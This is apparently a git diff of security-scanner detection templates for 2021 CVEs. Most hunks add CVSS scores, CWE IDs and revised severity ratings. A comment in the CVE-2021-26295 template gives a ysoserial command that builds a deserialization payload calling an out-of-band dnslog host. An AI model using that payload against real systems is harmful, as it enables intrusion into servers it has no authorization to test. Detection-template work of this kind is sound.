a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-26086 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index cef67180f6..ab08b76304 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -13,6 +13,11 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26295 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml index bc9d4332f5..197a0e35f5 100644 --- a/cves/2021/CVE-2021-26475.yaml +++ b/cves/2021/CVE-2021-26475.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf severity: medium tags: cve,cve2021,xss,eprints + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26475 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26710.yaml b/cves/2021/CVE-2021-26710.yaml index ed5fc3662d..df2e680cab 100644 --- a/cves/2021/CVE-2021-26710.yaml +++ b/cves/2021/CVE-2021-26710.yaml @@ -7,6 +7,11 @@ info: description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter. reference: https://vict0ni.me/report2web-xss-frame-injection.html tags: cve,cve2021,redwood,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26710 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml index 3b867adacd..72c53cc241 100644 --- a/cves/2021/CVE-2021-26722.yaml +++ b/cves/2021/CVE-2021-26722.yaml @@ -7,6 +7,11 @@ info: description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. reference: https://github.com/linkedin/oncall/issues/341 tags: cve,cve2021,linkedin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26722 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml index 7358094f07..8372fc51ee 100644 --- a/cves/2021/CVE-2021-26723.yaml +++ b/cves/2021/CVE-2021-26723.yaml @@ -11,6 +11,11 @@ info: - https://jenzabar.com/blog - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328 tags: cve,cve2021,jenzabar,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26723 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index 032841467b..e8d74a17dc 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26812 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 2b7a25ea5d..f2b5e87856 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -12,6 +12,10 @@ info: - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26855 requests: - raw: diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 0f16811c2a..5718543b60 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -3,9 +3,17 @@ id: CVE-2021-27132 info: name: CRLF Injection - Sercomm VD625 author: geeknik - severity: medium + severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 tags: cve,cve2021,crlf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27132 + cwe-id: CWE-74 + reference: + - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + - http://sercomm.com requests: - method: GET diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index b356cf909a..4f26fcca3a 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -7,6 +7,11 @@ info: description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. reference: https://www.exploit-db.com/exploits/49597 tags: cve,cve2021,triconsole,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-27330 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml index 0b53b90095..0bd9968499 100644 --- a/cves/2021/CVE-2021-27651.yaml +++ b/cves/2021/CVE-2021-27651.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 severity: critical tags: cve,cve2021,pega,auth-bypass + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27651 + cwe-id: CWE-287,CWE-640 requests: - method: GET diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index cba085815d..44b1b651c3 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -9,6 +9,11 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 tags: cve,cve2021,apache,tapestry + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27850 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index b14c3ad7df..7d28fe62e8 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -3,7 +3,7 @@ id: CVE-2021-27905 info: name: Apache Solr <= 8.8.1 SSRF author: hackergautam - severity: medium + severity: critical tags: cve,cve2021,apache,solr,ssrf description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. reference: @@ -11,6 +11,11 @@ info: - https://ubuntu.com/security/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27905 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index 33dd3f51b9..5529e9a825 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 tags: cve,cve2021,hongdian,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-28149 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index b16d0b19a0..0970614363 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -9,6 +9,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 tags: cve,cve2021,hongdian,exposure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2021-28150 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 34b2b86083..60ffa8230b 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 tags: cve,cve2021,hongdian,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-28151 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 40408c866b..35d226536b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -10,6 +10,11 @@ info: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28164 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index e88a103bc6..2c4b5ba010 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -10,6 +10,11 @@ info: description: | For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28169 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index d591e23f66..ae168da091 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -10,6 +10,11 @@ info: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/advisories/GHSA-pch5-whg9-qr2r + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2021-28918 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2021/CVE-2021-28937.yaml b/cves/2021/CVE-2021-28937.yaml index 30132099ca..7c00cd061c 100644 --- a/cves/2021/CVE-2021-28937.yaml +++ b/cves/2021/CVE-2021-28937.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - severity: medium + severity: high tags: cve,cve2021,acexy,disclosure,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-28937 + cwe-id: CWE-312 requests: - method: GET diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml index b92aededf1..976a0d7a51 100644 --- a/cves/2021/CVE-2021-29156.yaml +++ b/cves/2021/CVE-2021-29156.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2021,openam description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email. reference: https://blog.cybercastle.io/ldap-injection-in-openam/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29156 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 46e6805abe..4a1d38914d 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -8,6 +8,11 @@ info: reference: - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29203 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml index ac947cde4f..87203f1c21 100644 --- a/cves/2021/CVE-2021-29441.yaml +++ b/cves/2021/CVE-2021-29441.yaml @@ -11,9 +11,14 @@ info: This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. author: dwisiswant0 - severity: high + severity: critical reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29441 + cwe-id: CWE-290 requests: - raw: diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml index 81a6d3fc5d..7b61103f73 100644 --- a/cves/2021/CVE-2021-29442.yaml +++ b/cves/2021/CVE-2021-29442.yaml @@ -10,6 +10,11 @@ info: severity: high reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 51791de0f0..c76ead0c70 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml index ff5a0b4b8a..95b34e9478 100644 --- a/cves/2021/CVE-2021-29622.yaml +++ b/cves/2021/CVE-2021-29622.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 severity: medium tags: cve,cve2021,prometheus,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29622 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml index 26175c05d3..d5e3bd655d 100644 --- a/cves/2021/CVE-2021-29625.yaml +++ b/cves/2021/CVE-2021-29625.yaml @@ -9,6 +9,11 @@ info: - https://sourceforge.net/p/adminer/bugs-and-features/797/ - https://www.cvedetails.com/cve/CVE-2021-29625/ tags: cve,cve2021,adminer,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29625 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 5b47b94607..c1251e9592 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -3,12 +3,17 @@ id: CVE-2021-30151 info: name: CVE-2021-30151 author: DhiyaneshDk - severity: low + severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss,sidekiq + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-30151 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 0168388bab..5a60c6d460 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -9,6 +9,10 @@ info: - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 tags: cve,cve2021,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3017 requests: - method: GET diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml index 67895708da..c642949eea 100644 --- a/cves/2021/CVE-2021-3019.yaml +++ b/cves/2021/CVE-2021-3019.yaml @@ -3,12 +3,17 @@ id: CVE-2021-3019 info: name: Lanproxy Directory Traversal author: pikpikcu - severity: medium + severity: high description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet. reference: - https://github.com/ffay/lanproxy/commits/master - https://github.com/maybe-why-not/lanproxy/issues/1 tags: cve,cve2021,lanproxy,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3019 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml index 6de9e167ab..a5bbb3a5a1 100644 --- a/cves/2021/CVE-2021-30461.yaml +++ b/cves/2021/CVE-2021-30461.yaml @@ -7,6 +7,11 @@ info: description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-30461 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml index 64112f9e82..f25315a536 100644 --- a/cves/2021/CVE-2021-31249.yaml +++ b/cves/2021/CVE-2021-31249.yaml @@ -7,6 +7,10 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 severity: medium tags: cve,cve2021,chiyu,crlf,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2021-31249 requests: - method: GET diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml index f03536d032..da104e45c7 100644 --- a/cves/2021/CVE-2021-31250.yaml +++ b/cves/2021/CVE-2021-31250.yaml @@ -7,6 +7,11 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 severity: medium tags: cve,cve2021,chiyu,xss,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-31250 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 8a0135ebcb..30d25808bb 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -9,6 +9,10 @@ info: - https://www.ambionics.io/blog/laravel-debug-rce - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 tags: cve,cve2021,laravel,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3129 requests: - raw: diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml index 0e40527eea..10abaf9ffe 100644 --- a/cves/2021/CVE-2021-31537.yaml +++ b/cves/2021/CVE-2021-31537.yaml @@ -7,6 +7,11 @@ info: reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ severity: medium tags: cve,cve2021,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-31537 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml index 4239a6763e..9da45f7140 100644 --- a/cves/2021/CVE-2021-31581.yaml +++ b/cves/2021/CVE-2021-31581.yaml @@ -8,6 +8,12 @@ info: - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ severity: medium tags: cve,cve2021,akkadian,mariadb,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.40 + cve-id: CVE-2021-31581 + cwe-id: CWE-312 + description: "The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later)." requests: - method: GET diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 71be85cd28..66ef428473 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -9,6 +9,11 @@ info: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai tags: cve,cve2021,tenda,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31755 + cwe-id: CWE-787 requests: - raw: diff --git a/cves/2021/CVE-2021-31856.yaml b/cves/2021/CVE-2021-31856.yaml index deb18ee2f2..86cd3cb7a1 100644 --- a/cves/2021/CVE-2021-31856.yaml +++ b/cves/2021/CVE-2021-31856.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ssst0n3/CVE-2021-31856 - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 tags: sqli,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index 47b367c664..5918a5c871 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -3,10 +3,15 @@ id: CVE-2021-32030 info: name: ASUS GT-AC2900 - Authentication Bypass author: gy741 - severity: high + severity: critical description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. reference: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass tags: cve,cve2021,asus,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32030 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 801dd5b095..31a095515f 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -9,6 +9,11 @@ info: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 tags: cve,cve2020,node-red-dashboard,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3223 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index 70f2fb7787..c85b8eac3a 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html tags: cve,cve2021,websvn,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 3b08cefdd4..455e65993d 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -3,7 +3,7 @@ id: CVE-2021-32819 info: name: Nodejs squirrelly template engine RCE author: pikpikcu - severity: critical + severity: high description: | Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is @@ -13,6 +13,10 @@ info: - https://www.linuxlz.com/aqld/2331.html - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 tags: cve,cve2021,nodejs,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-32819 requests: - method: GET diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 3c91c1e2a2..99daa3b409 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -3,11 +3,17 @@ id: CVE-2021-32820 info: name: Express-handlebars Path Traversal author: dhiyaneshDk - severity: medium + severity: high reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json tags: 